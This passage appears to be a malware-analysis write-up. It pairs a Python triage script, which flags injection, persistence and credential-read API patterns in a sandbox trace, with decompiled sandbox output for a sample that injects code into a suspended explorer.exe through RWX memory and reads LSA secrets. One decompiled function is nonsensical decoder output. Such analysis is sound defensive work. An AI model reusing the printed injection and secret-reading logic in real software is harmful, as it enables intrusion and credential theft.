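GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
  • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
  • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
  • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
GetLastError.KERNEL32(00000000,0040BEF8,0000000E), ref: 0040BA95
CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?)
VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
"""

HKEY_CURRENT_USER = 0x80000001      # predefined hive handle value
ERROR_ALREADY_EXISTS = 0xB7         # 183, the value E0040BA84 compares against
CREATE_SUSPENDED = 0x00000004       # dwCreationFlags bit seen in E0040B3C0
# Exports an ordinary binary would import statically; resolving them by name
# at run time keeps them out of the import table.
SENSITIVE_EXPORTS = {"IsDebuggerPresent", "ShellExecuteA",
                     "GetWindowsDirectoryA", "GetSystemDirectoryA"}
KEY_OPENERS = {"RegOpenKeyExA", "RegOpenKeyA", "RegCreateKeyExA", "RegCreateKeyA"}

PREFIX_RE = re.compile(r"^[\s•]*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?")
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*?)\)(?:, ref: (?P<ref>[0-9A-Fa-f]{8}))?$")


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: Optional[str]          # call-site address, if the bullet carries one


@dataclass(frozen=True)
class Finding:
    rule: str
    ref: Optional[str]
    detail: str


def parse_line(line: str) -> Optional[Call]:
    """Parse one bullet; headings and other non-call text give None."""
    text = PREFIX_RE.sub("", line.strip(), count=1)
    m = CALL_RE.match(text)
    if not m:
        return None
    args = tuple(m.group("args").split(",")) if m.group("args") else ()
    return Call(m.group("api"), m.group("mod"), args, m.group("ref"))


def as_int(arg: str) -> Optional[int]:
    """Hex argument -> int; '?' and string arguments give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def triage(trace: str) -> List[Finding]:
    calls = [c for c in map(parse_line, trace.splitlines()) if c is not None]
    findings: List[Finding] = []
    for i, call in enumerate(calls):
        prev = calls[i - 1] if i > 0 else None

        # 1. Run-time resolution of a sensitive export. The argument snapshot can
        #    hold stale stack slots, so the name may sit on the LoadLibraryA bullet
        #    rather than the GetProcAddress one; inspect the pair together.
        if call.api == "GetProcAddress":
            names = set(call.args)
            if prev is not None and prev.api == "LoadLibraryA":
                names |= set(prev.args)
            for name in sorted(names & SENSITIVE_EXPORTS):
                findings.append(Finding("dynamic-resolve", call.ref, name))

        # 2. Opening Active Setup\Installed Components: StubPath entries there
        #    run at logon, so any open/create/delete here is persistence-related.
        if call.api in KEY_OPENERS and any(
                "Active Setup\\Installed Components" in a for a in call.args):
            hive = "HKCU" if as_int(call.args[0]) == HKEY_CURRENT_USER else call.args[0]
            findings.append(Finding("active-setup-key", call.ref, hive))

        # 3. LSA private data is stored credential material.
        if call.api == "LsaRetrievePrivateData":
            findings.append(Finding("lsa-secret-read", call.ref, "LsaRetrievePrivateData"))

        # 4. CreateMutexA immediately followed by GetLastError: the
        #    ERROR_ALREADY_EXISTS probe idiom.
        if call.api == "GetLastError" and prev is not None and prev.api == "CreateMutexA":
            findings.append(Finding("mutex-probe", call.ref,
                                    "GetLastError == 0x%X" % ERROR_ALREADY_EXISTS))

        # 5. CreateProcessA with CREATE_SUSPENDED in dwCreationFlags (6th argument),
        #    the usual prelude to writing into the child before it runs.
        if call.api == "CreateProcessA" and len(call.args) >= 6:
            flags = as_int(call.args[5])
            if flags is not None and flags & CREATE_SUSPENDED:
                findings.append(Finding("create-suspended", call.ref,
                                        "dwCreationFlags=0x%X" % flags))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_TRACE):
        print(f"{f.rule:<18} ref={f.ref or '-':<8} {f.detail}")
```

Two caveats the script has to live with. The argument list attached to each bullet is a snapshot of the stack at call time and can carry stale slots, which is why the GetProcAddress bullet at 00405AF4 above shows shell32.dll where the export name should be while ShellExecuteA sits on the LoadLibraryA bullet at 00405AEE; the dynamic-resolve rule therefore reads the adjacent pair rather than GetProcAddress alone. And E0040BA84 closes the mutex handle on both paths, so the mutex-probe finding marks a test of whether "_x_X_BLOCKMOUSE_X_x_" already exists, not a single-instance guard that holds it.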

                                    Executed Functions

                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				struct _PROCESS_INFORMATION _v28;
                                    				struct _STARTUPINFOA _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				intOrPtr _t58;
                                    				intOrPtr* _t60;
                                    				intOrPtr* _t61;
                                    				char* _t62;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t91;
                                    				intOrPtr* _t99;
                                    				void* _t104;
                                    				intOrPtr* _t113;
                                    				intOrPtr* _t119;
                                    				intOrPtr* _t124;
                                    				intOrPtr _t129;
                                    				intOrPtr* _t137;
                                    				void* _t142;
                                    				intOrPtr* _t151;
                                    				intOrPtr _t159;
                                    				char* _t161;
                                    				struct HWND__* _t163;
                                    				void* _t168;
                                    				intOrPtr _t197;
                                    				intOrPtr _t201;
                                    				intOrPtr _t210;
                                    				intOrPtr _t221;
                                    				void* _t236;
                                    				void* _t239;
                                    				void* _t241;
                                    
                                    				_t234 = __edi;
                                    				_t194 = __ecx;
                                    				_t185 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v116 = 0;
                                    				_v112 = 0;
                                    				_v108 = 0;
                                    				_v104 = 0;
                                    				_v100 = 0;
                                    				_push(_t239);
                                    				_push(0x40b7a8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t239 + 0xffffff90;
                                    				_t58 =  *0x40d1cc; // 0x40e924
                                    				_t236 = E00401F9C(_t58);
                                    				_t60 =  *0x40d210; // 0x40e8ec
                                    				_t241 =  *_t60 - 2;
                                    				if(_t241 != 0) {
                                    					_t61 =  *0x40d210; // 0x40e8ec
                                    					__eflags =  *_t61 - 1;
                                    					if(__eflags != 0) {
                                    						_t62 =  *0x40d1b8; // 0x40e8fc
                                    						__eflags =  *_t62 - 1;
                                    						if( *_t62 == 1) {
                                    							__eflags = 0;
                                    							E004013A4(0,  &_v116);
                                    							E00401E94( *0x40f1e8, _v116);
                                    							if(__eflags != 0) {
                                    								_t194 = E00401F48( *0x40f1e8);
                                    								__eflags = 0;
                                    								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
                                    								E0040AFB0(__ebx, _t85, _t236, 0);
                                    								ExitProcess(0);
                                    							}
                                    						}
                                    						_t197 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = 0;
                                    						E004013A4(0, _t197);
                                    						E00403738();
                                    						E00403738();
                                    						_t71 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
                                    						_t91 =  *0x40d21c; // 0x40e8f0
                                    						E00401B14(_t91, _v112);
                                    						E00403738();
                                    						E00403738();
                                    						_t99 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						__eflags = _t104;
                                    						if(_t104 == 0) {
                                    							_t210 =  *0x40d21c; // 0x40e8f0
                                    							E004013A4(0, _t210);
                                    							E00403738();
                                    							E00403738();
                                    							_t113 =  *0x40d21c; // 0x40e8f0
                                    							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    				} else {
                                    					_t119 =  *0x40d21c; // 0x40e8f0
                                    					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
                                    					E00401E94(_v100, "explorer.exe");
                                    					if(_t241 != 0) {
                                    						_t124 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
                                    						if(__eflags != 0) {
                                    							E00406294( &_v108, _t185, __edi, _t236, __eflags);
                                    							_t129 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t129, _v108);
                                    						} else {
                                    							E004063FC(_v12,  &_v104);
                                    							_t159 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t159, _v104);
                                    						}
                                    						E00403738();
                                    						E00403738();
                                    						_t137 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						_t161 =  *0x40d214; // 0x40e8f4
                                    						if( *_t161 != 1) {
                                    							_t163 = FindWindowA("shell_traywnd", 0); // executed
                                    							GetWindowThreadProcessId(_t163,  &_v8);
                                    							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
                                    							__eflags = _t168;
                                    							if(_t168 != 0) {
                                    								_t142 = 1;
                                    							} else {
                                    								E00403738();
                                    								E00403738();
                                    								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
                                    								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
                                    							}
                                    						} else {
                                    							E00403738();
                                    							E00403738();
                                    							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    					if(_t142 == 0) {
                                    						_t221 =  *0x40d21c; // 0x40e8f0
                                    						E004013A4(0, _t221);
                                    						E00403738();
                                    						E00403738();
                                    						_t151 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					}
                                    				}
                                    				_pop(_t201);
                                    				 *[fs:eax] = _t201;
                                    				_push(E0040B7AF);
                                    				return E00401AE4( &_v116, 5);
                                    			}

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				char _v13;
                                    				intOrPtr _v20;
                                    				void* _v24;
                                    				long _v28;
                                    				intOrPtr _v36;
                                    				long _v44;
                                    				void* _v48;
                                    				void* _t38;
                                    				void* _t42;
                                    				void* _t49;
                                    				void* _t55;
                                    				void* _t57;
                                    				intOrPtr _t64;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				void* _t74;
                                    				void* _t76;
                                    				void* _t79;
                                    				intOrPtr* _t80;
                                    
                                    				_t80 = _t79 + 0xffffffd4;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_t64 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v48, _t64);
                                    				_push(_t79);
                                    				_push(0x404205);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t80;
                                    				_v13 = 0;
                                    				_push(0);
                                    				_push(_v12);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
                                    				_t76 = 0x10000000;
                                    				do {
                                    					_t76 = _t76 + 0x10000;
                                    					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
                                    					_t57 = _t38;
                                    					if(_t57 != 0) {
                                    						VirtualFree(_t57, 0, 0x8000); // executed
                                    						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
                                    						_t57 = _t55;
                                    					}
                                    				} while (_t57 == 0 && _t76 <= 0x30000000);
                                    				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
                                    				_t42 = _v48;
                                    				if(_t42 != 0) {
                                    					_v24 = _t42;
                                    					_v20 = _v36;
                                    					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
                                    					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
                                    					if(_t49 != 0) {
                                    						_v13 = 1;
                                    					}
                                    				}
                                    				_pop(_t67);
                                    				 *[fs:eax] = _t67;
                                    				_push(E0040420C);
                                    				_t68 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v48, _t68);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
                                    				signed char _t26;
                                    				void* _t32;
                                    				intOrPtr* _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				signed int _t49;
                                    				signed char _t55;
                                    				intOrPtr _t58;
                                    				void* _t60;
                                    				signed char* _t61;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    
                                    				_t61 = __edi;
                                    				_t55 = __edx;
                                    				_t49 = __ecx;
                                    				_t48 = __ebx;
                                    				asm("aaa");
                                    				 *__ecx =  *__ecx + __edx;
                                    				_t26 = __eax + 0x00000001 | 0x00000054;
                                    				_push(__ebx);
                                    				if(_t26 == 0) {
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t67;
                                    					E00401CAC(_t65 - 8, __ebx);
                                    					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
                                    					E00401CAC(_t65 - 0xc, __ebx);
                                    					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
                                    					_pop(_t58);
                                    					 *[fs:eax] = _t58;
                                    					_push(E00403871);
                                    					return E00401AE4(_t65 - 0xc, 2);
                                    				} else {
                                    					_t66 =  *(__esi + 0x67) * 0x61727241;
                                    					if(_t66 < 0) {
                                    						 *_t26 =  *_t26 + _t26;
                                    						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
                                    					}
                                    					asm("adc [eax], al");
                                    					_t43 = _t26 - 1;
                                    					 *_t43 =  *_t43 + _t43;
                                    					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
                                    					 *_t49 =  *_t49 + _t55;
                                    					_push(_t66);
                                    					asm("outsb");
                                    					asm("aaa");
                                    					_t45 = _t43 + 2;
                                    					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
                                    					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
                                    					asm("bound ecx, [ecx+0x6e]");
                                    					asm("outsw");
                                    					asm("adc al, 0x0");
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t61 = _t55;
                                    					_t46 = _t45 + 1;
                                    					 *_t46 =  *_t46 + _t55;
                                    					 *_t46 =  *_t46 + _t46;
                                    					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
                                    					_t60 = 0;
                                    					do {
                                    						_t60 = _t60 + 1;
                                    					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
                                    					return _t60;
                                    				}
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				void* _t14;
                                    				void* _t26;
                                    				intOrPtr _t33;
                                    				void* _t38;
                                    				intOrPtr _t41;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t26 = __edx;
                                    				_t38 = __eax;
                                    				_push(_t41);
                                    				_push(0x40386a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t41;
                                    				E00401CAC( &_v12, __edx);
                                    				// 0x3000 == MEM_COMMIT | MEM_RESERVE, 0x40 == PAGE_EXECUTE_READWRITE: an RWX region in the target process _t38,
                                    				// sized to the length E00401D50 computes plus one; the region's address comes back in _t14
                                    				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
                                    				E00401CAC( &_v16, _t26);
                                    				// copy the buffer at _t26 into that region; _v8 receives the number of bytes written
                                    				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00403871);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    Addresses (one per C-code statement above): 0x004037ef, 0x004037f1, 0x004037f3, 0x004037f8, 0x004037fa, 0x004037fe, 0x004037ff, 0x00403804, 0x00403807, 0x00403816, 0x00403828, 0x00403838, 0x0040384a, 0x00403851, 0x00403854, 0x00403857, 0x00403869

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _WIN32_FIND_DATAA _v328;
                                    				void* _t13;
                                    				intOrPtr _t23;
                                    				void* _t26;
                                    
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t26);
                                    				_push(0x405d61);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t26 + 0xfffffebc;
                                    				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
                                    				// 0xffffffff == INVALID_HANDLE_VALUE; the find data in _v328 is not used after the call and the handle is
                                    				// closed at once, so this is a plain does-this-path-exist test
                                    				if(_t13 != 0xffffffff) {
                                    					FindClose(_t13); // executed
                                    				}
                                    				_pop(_t23);
                                    				 *[fs:eax] = _t23;
                                    				_push(E00405D68);
                                    				return E00401AC0( &_v8);
                                    			}

                                    Addresses (one per C-code statement above): 0x00405d0e, 0x00405d14, 0x00405d1b, 0x00405d1c, 0x00405d21, 0x00405d24, 0x00405d39, 0x00405d41, 0x00405d44, 0x00405d49, 0x00405d4d, 0x00405d50, 0x00405d53, 0x00405d60

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
                                    				void* _t2;
                                    				void* _t5;
                                    				void* _t9;
                                    				long _t10;
                                    				void* _t11;
                                    				SIZE_T* _t12;
                                    
                                    				_push(__ecx);
                                    				_t10 = __ecx;
                                    				_t11 = __edx;
                                    				_t5 = __eax;
                                    				// 0x3000 == MEM_COMMIT | MEM_RESERVE, 0x40 == PAGE_EXECUTE_READWRITE, as in E004037EC but with a caller-supplied length
                                    				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
